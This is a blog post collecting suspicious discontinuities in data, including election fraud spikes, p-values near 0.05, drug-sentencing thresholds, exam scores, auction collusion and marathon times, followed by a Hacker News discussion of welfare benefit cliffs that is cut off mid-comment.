A second order effect of universities optimizing for Pell Grant recipients is that savvy parents can do the same thing that some people do to cut their taxable income at the last minute. Someone might put money into a traditional IRA instead of a Roth IRA and, if they're at their IRA contribution limit, they can try to lose money on options, effectively transferring money to options traders who are likely to be wealthier than them, in order to bring their income below the Pell Grant threshold, increasing the probability that their children will be admitted to a selective school.

The following histograms of Russian elections across polling stations shows curious spikes in turnout and results at nice, round, numbers (e.g., 95%) starting around 2004. This appears to indicate that there's election fraud via fabricated results and that at least some of the people fabricating results don't bother with fabricating results that have a smooth distribution.

For finding fraudulent numbers, also see, Benford's law.

Authors of psychology papers are incentivized to produce papers with p values below some threshold, usually 0.05, but sometimes 0.1 or 0.01. Masicampo et al. plotted p values from papers published in three psychology journals and found a curiously high number of papers with p values just below 0.05.

The spike at p = 0.05 consistent with a number of hypothesis that aren't great, such as:

  • Authors are fudging results to get p = 0.05
  • Journals are much more likely to accept a paper with p = 0.05 than if p = 0.055
  • Authors are much less likely to submit results if p = 0.055 than if p = 0.05

Head et al. (2015) surveys the evidence across a number of fields.

Andrew Gelman and others have been campaigning to get rid of the idea of statistical significance and p-value thresholds for years, see this paper for a short summary of why. Not only would this reduce the incentive for authors to cheat on p values, there are other reasons to not want a bright-line rule to determine if something is 'significant' or not.

The top two graphs in this set of four show histograms of the amount of cocaine people were charged with possessing before and after the passing of the Fair Sentencing Act in 2010, which raised the amount of cocaine necessary to trigger the 10-year mandatory minimum prison sentence for possession from 50g to 280g. There's a relatively smooth distribution before 2010 and a sharp discontinuity after 2010.

The bottom-left graph shows the sharp spike in prosecutions at 280 grams followed by what might be a drop in 2013 after evidentiary standards were changed.

Birth month and sports

These are scatterplots of football (soccer) players in the UEFA Youth League. The x-axis on both of these plots is how old players are modulo the year, i.e., their birth month normalized from 0 to 1.

The graph on the left is a histogram, which shows that there is a very strong relationship between where a person's birth falls within the year and their odds of making a club at the UEFA Youth League (U19) level. The graph on the right purports to show that birth time is only weakly correlated with actual value provided on the field. The authors use playing time as a proxy for value, presumably because it's easy to measure. That's not a great measure, but the result they find (younger-within-the-year players have higher value, conditional on making the U19 league) is consistent with other studies on sports and discrimination, which ind (for example) that black baseball players were significantly better than white baseball players for decades after desegregation in baseball, French-Canadian defensemen are also better than average (French-Canadians are stereotypically afraid to fight, don't work hard enough, and are too focused on offense).

The discontinuity isn't directly shown in the graphs above because the graphs only show birth date for one year. If we were to plot birth date by cohort across multiple years, we'd expect to see a sawtooth pattern in the probability that a player makes it into the UEFA youth league with a 10x difference between someone born one day before vs. after the threshold.

This phenomenon, that birth day or month is a good predictor of participation in higher-level youth sports as well as pro sports, has been studied across a variety of sports.

It's generally believed that this is caused by a discontinuity in youth sports:

  1. Kids are bucketed into groups by age in years and compete against people in the same year
  2. Within a given year, older kids are stronger, faster, etc., and perform better
  3. This causes older-within-year kids to outcompete younger kids, which later results in older-within-year kids having higher levels of participation for a variety of reasons

This is arguably a 'bug' in how youth sports works. But as we've seen in baseball as well as a survey of multiple sports, obviously bad decision making that costs individual teams tens or even hundreds of millions of dollars can persist for decades in the face of people pubicly discussing how bad the decisions are. In this case, the youth sports teams aren't feeder teams to pro teams, so they don't have a financial incentive to select players who are skilled for their age (as opposed to just taller and faster because they're slightly older) so this system-wide non-optimal even more difficult to fix than pro sports teams making locally non-optimal decisions that are completely under their control.

This is a histogram of high school exit exam scores from the Polish language exam. We can see that a curiously high number of students score 30 or just above thirty while curiously low number of students score from 23-29. This is from 2013; other years I've looked at (2010-2012) show a similar discontinuity.

Math exit exam scores don't exhibit any unusual discontinuities in the years I've examined (2010-2013).

An anonymous reddit commenter explains this:

When a teacher is grading matura (final HS exam), he/she doesn't know whose test it is. The only things that are known are: the number (code) of the student and the district which matura comes from (it is usually from completely different part of Poland). The system is made to prevent any kind of manipulation, for example from time to time teachers supervisor will come to check if test are graded correctly. I don't wanna talk much about system flaws (and advantages), it is well known in every education system in the world where final tests are made, but you have to keep in mind that there is a key, which teachers follow very strictly when grading.

So, when a score of the test is below 30%, exam is failed. However, before making final statement in protocol, a commision of 3 (I don't remember exact number) is checking test again. This is the moment, where difference between humanities and math is shown: teachers often try to find a one (or a few) missing points, so the test won't be failed, because it's a tragedy to this person, his school and somewhat fuss for the grading team. Finding a 'missing' point is not that hard when you are grading writing or open questions, which is a case in polish language, but nearly impossible in math. So that's the reason why distribution of scores is so different.

As with p values, having a bright-line threshold, causes curious behavior. In this case, scoring below 30 on any subject (a 30 or above is required in every subject) and failing the exam has arbitrary negative effects for people, so teachers usually try to prevent people from failing if there's an easy way to do it, but a deeper root of the problem is the idea that it's necessary to produce a certification that's the discretization of a continuous score.

Kawai et al. looked at Japanese government procurement, in order to find suspicious pattern of bids like the ones described in Porter et al. (1993), which looked at collusion in procurement auctions on Long Island (in New York in the United States). One example that's given is:

In February 1983, the New York State Department of Transportation (DoT) held a pro- curement auction for resurfacing 0.8 miles of road. The lowest bid in the auction was $4 million, and the DoT decided not to award the contract because the bid was deemed too high relative to its own cost estimates. The project was put up for a reauction in May 1983 in which all the bidders from the initial auction participated. The lowest bid in the reauction was 20% higher than in the initial auction, submitted by the previous low bidder. Again, the contract was not awarded. The DoT held a third auction in February 1984, with the same set of bidders as in the initial auction. The lowest bid in the third auction was 10% higher than the second time, again submitted by the same bidder. The DoT apparently thought this was suspicious: "It is notable that the same firm submitted the low bid in each of the auctions. Because of the unusual bidding patterns, the contract was not awarded through 1987."

It could be argued that this is expected because different firms have different cost structures, so the lowest bidder in an auction for one particular project should be expected to be the lowest bidder in subsequent auctions for the same project. In order to distinguish between collusion and real structural cost differences between firms, Kawai et al. (2015) looked at auctions where the difference in bid between the first and second place firms was very small, making the winner effectively random.

In the auction structure studied, bidders submit a secret bid. If the secret bid is above a secret minimum, then the lowest bidder wins the auction and gets the contract. If not, the lowest bid is revealed to all bidders and another round of bidding is done. Kawai et al. found that, in about 97% of auctions, the bidder who submitted the lowest bid in the first round also submitted the lowest bid in the second round (the probability that the second lowest bidder remains second lowest was 26%).

Below, is a histogram of the difference in first and second round bids between the first-lowest and second-lowest bidders (left column) and the second-lowest and third-lowest bidders (right column). Each row has a different filtering criteria for how close the auction has to be in order to be included. In the top row, all auctions that reached the third round were included; in second, and third rows, the normalized delta between the first and second biders was less than 0.05 and 0.01, respectively; in the last row, the normalized delta between the first and the third bidder was less than 0.03. All numbers are normalized because the absolute size of auctions can vary.

We can see that the distributions of deltas between the first and second round are roughly symmetrical when comparing second and third lowest bidders. But when comparing first and second lowest bidders, there's a sharp discontinuity at zero, indicating that second-lowest bidder almost never lowers their bid by more than the first-lower bidder did. If you read the paper, you can see that the same structure persists into auctions that go into a third round.

I don't mean to pick on Japanese procurement auctions in particular. There's an extensive literature on procurement auctions that's found collusion in many cases, often much more blatant than the case presented above (e.g., there are a few firms and they round-robin who wins across auctions, or there are a handful of firms and every firm except for the winner puts in the same losing bid).

The histograms below show a sharp discontinuity between 13 and 14, which is the difference between an A grade and a B grade. It appears that some regions also have a discontinuity between 27 and 28, which is the difference between a B and a C and this older analysis from 2014 found what appears to be a similar discontinuity between B and C grades.

Inspectors have discretion in what violations are tallied and it appears that there are cases where restaurant are nudged up to the next higher grade.

A histogram of marathon finishing times (finish times on the x-axis, count on the y-axis) across 9,789,093 finishes shows noticeable discontinuities at every half hour, as well as at 'round' times like :10, :15, and :20.

An analysis of times within each race (see section 4.4, figures 7-9) indicates that this is at least partially because people speed up (or slow down less than usual) towards the end of races if they're close to a 'round' time.

Notes

This post doesn't really have a goal or a point, it's just a collection of discontinuities that I find fun.

One thing that's maybe worth noting is that I've gotten a lot of mileage out in my career both out of being suspicious of discontinuities and figuring out where they come from and also out of applying standard techniques to smooth out discontinuities.

For finding discontinuities, basic tools like 'drawing a scatterplot', 'drawing a histogram', 'drawing the CDF' often come in handy. Other kinds of visualizations that add temporality, like flamescope, can also come in handy.

We noted above that queues create a kind of discontinuity that, in some circumstances, should be smoothed out. We also noted that we see similar behavior for other kinds of thresholds and that randomization can be a useful tool to smooth out discontinuities in thresholds as well. Randomization can also be used to allow for reducing quantization error when reducing precision with ML and in other applications.

Thanks to Leah Hanson, Omar Rizwan, Dmitry Belenko, Kamal Marhubi, Danny Vilea, Nick Roberts, Lifan Zeng, Wesley Aptekar-Cassels, Thomas Hauk, @BaudDev, and Michael Sullivan for comments/corrections/discussion.

Also, please feel free to send me other interesting discontinuities!




All Comments: [-] | anchor

btilly(768) 5 days ago [-]

The perverse incentives around these discontinuities is one of the worst misfeatures of programs intended to help people.

Here is a real example. My niece wound up with 3 kids, divorced, with inconsistent child support payments. So she went on food stamps. She was looking for a better job. She found one, interviewed, and they wanted to hire her. But the salary that they offered was $0.50/hour too much for her to stay on food stamps, and was less than her current job. Thanks to union regulations, the person who wanted to hire her couldn't pay her less than the standard salary. The result is that she did not take the job.

A common result when Congress takes note of perverse incentives like this is that they introduce a more complex program with specific terms that address specific problems that emerged. The problem is that by creating more brackets and more complex rules you usually create MORE cliffs with perverse incentives (though the perverse incentive at each cliff tends to be less).

Another solution is to introduce rules that attempt to identify people who are 'abusing the system' and punish them. So, for example, you can only be on welfare for a limited time because people got outraged that single mothers wound up on welfare for a long time. However those single mothers were acting that was in part because they were better off on welfare looking after their own kids than they were in a low end job and paying for daycare.

Stereotypically the first type of solution is characteristic of Democrats and the second of Republicans. But the truth is that both parties do a lot of both solutions.

kazagistar(10000) 4 days ago [-]

The leftist solutions are to get rid of of the conditions entirely, and find non-means-tested ways to accomplish goals more universally. The advantage here is significantly reduced administrative costs, freeing up time and energy of those in a tough situation on recovery rather then stress over beurocracy and limitations, and of course, people not viewing the people on the programs as morally deficient.

Social security, fire departments, medicare, primary education etc are all available broadly, and are broadly liked by people. People using these government handouts aren't considered lesser for it.

Polylactic_acid(10000) 5 days ago [-]

I'm not an expert on the system in Australia but how I think it works from what I have heard is there isn't a cut off point where if you make x you are eligible and if you make x+1 you aren't. Instead its a slope where if you make x+1 you lose a certain % of the payments until you eventually make enough to lose them all. But at all times its still better to take the job.

dragonwriter(4317) 5 days ago [-]

> The perverse incentives around these discontinuities is one of the worst misfeatures of programs intended to help people.

This is a key motivation for replacing many of those programs with UBI funded by progressive taxes.

boomboomsubban(10000) 5 days ago [-]

>But the salary that they offered was $0.50/hour too much for her to stay on food stamps, and was less than her current job

The salary was lower but would somehow remove her eligibility for food stamps?

dTal(3892) 4 days ago [-]

>the salary that they offered was $0.50/hour too much for her to stay on food stamps, and was less than her current job

I don't understand. How was she eligible for food stamps, if she already had a job that paid more?

bo1024(10000) 4 days ago [-]

This is one reason behind universal basic income as a welfare program. There are no hoops, no cutoffs, no distortion of incentives.

SilasX(4179) 5 days ago [-]

Relatedly, I learned about Universal Credit, an attempt by the UK to merge all their social benefits into one coherent system, and it seems like the cliff problem here is worse. From the BBC description:

https://www.bbc.com/news/uk-41487126

>Under the old system many faced a 'cliff edge', where people on a low income would lose a big chunk of their benefits in one go as soon as they started working more than 16 hours.

>In the new system, benefit payments are reduced at a consistent rate as income and earnings increase - for every extra £1 you earn after tax, you will lose 63p in benefits.

In other words, after fixing the cliffs of the system, you would 'only' face a 63% effective tax rate for working more. So whatever system they have no is even more discouraging. (That understates it because it's phrased post-tax; including a positive income tax, the total effective tax is even more!)

mrfusion(699) 5 days ago [-]

I guess like the artical mentions she could have bought put options.

jonnycomputer(4312) 4 days ago [-]

I agree, and I have my own stories to tell (like my foodstamps admin telling me to spend my tax return as quickly as possible or I'd lose foodstamps; which is doubly perverse).

A for tax brackets, why do they exist. I think our mathematics is advanced enough that things like tax brackets could be replaced by continuous functions. So its either by design or by lack of imagination that these discontinuities exist.

I've a friend from Finland who is vehemently opposed to any sort of means testing for any social program or aid. I see his point. Means testing creates all of the problems mentioned above ... and encourages those not eligible for them to view them as some burden that other people get but they pay for--fostering resentment.

113(10000) 4 days ago [-]

Sounds like the business should be paying their employees enough to feed their families.

selimthegrim(2089) 5 days ago [-]

How about the US killing like 10 "Al Qaeda No 2"s in a row for a while in Iraq

mumblemumble(3908) 5 days ago [-]

If you order your hit list right, you can kill a continuous streak of #2s, until there's only one person left.

refurb(2493) 5 days ago [-]

How is that weird? #2 gets killed, new #2 takes his/her place, #2 gets killed.

cs702(965) 5 days ago [-]

Any rules that can be gamed, sooner or later, inevitably, will be gamed.

The 'suspicious discontinuities' shown in this fantastic post are evidence for it.

It seems to be an Iron Law of Human Nature.

ChainOfFools(10000) 5 days ago [-]

what gets measured gets treasured

hn_throwaway_99(4203) 5 days ago [-]

This 'Iron Law of Human Nature' is a corollary of Goodhart's Law: https://en.wikipedia.org/wiki/Goodhart%27s_law

aeturnum(10000) 5 days ago [-]

This is a lovely post and good general demonstration on this phenomenon. The drug charging graph is particularly stark.

I think the most interesting graph is the final one, for marathon finishing times. The idea that people will fudge numbers to meet (or avoid) official definitions is commonly believed (and shown repeatedly here). It's more interesting to observe that it's not just people using motivated reasoning, but also that people will alter their performance to hit highly visible targets.

Wehrdo(10000) 4 days ago [-]

I think another factor for the marathon finishing time discontinuities is the use of pacers --- people who run carrying signs at a pre-defined speed (usually targeting a specific finishing time, e.g. 3:15). Lots of people who have finishing goals will run in a pack with this person so they know they're going fast enough, then will all finish just under the target time.

kauffj(4078) 5 days ago [-]

At least to me, the discontinuities in things like TANF, Medicaid, CHIP, etc. are some of the greatest signs of political dysfunction.

There's nothing remotely partisan about these being a bad thing. _Everyone_ should agree that these make no sense and mis-incentivize behavior. Yet these flaws remain for decades despite being known and discussed for approximately the entirety of their existence.

Balgair(1634) 5 days ago [-]

Not to belittle the lives that depend on this stuff, but these issues go back to flippin Rome. The Grain Dole was a huge part of Roman politics and it's history is fascinating reading:

https://en.wikipedia.org/wiki/Cura_Annonae#Politics_and_the_...

These issues are not very complicated: give people free stuff and they support you, let the next consuls/emperor worry about the revolts in Sicily (or whatever) that the Dole causes.

We keep saying that these problems will come back to haunt us, but that's all history has ever been.

thedance(10000) 5 days ago [-]

It's the stated goal of the party in power to throw as many kids off food assistance as possible. If the program has quirks that is by design.

chillacy(10000) 4 days ago [-]

It always seems like these programs being attackable is a benefit because it lets you continuously rally passionate donors to always fight for the programs and fund campaigns. Conversely, stable universal programs don't draw as much attention and fundraising.

stared(625) 5 days ago [-]

Ad Polish end of high school exams: quite a few years ago I created an interactive widget to explore it https://github.com/stared/delab-matury.

There are a few jokes about the Matural Distribution (Matura is the name of this exam) or the Polish Gaussian.

It is the Polish language, which is the most discontinuous. However:

- There are quite a few scores for the essay which are subjective (e.g. on the style).

- It is an official procedure that in the case of results on the edge, the person marking should mark an ambiguous score in the favour of the student.

ehnto(4300) 5 days ago [-]

> It is an official procedure that in the case of results on the edge, the person marking should mark an ambiguous score in the favour of the student

Given that it's subjective, I find that a really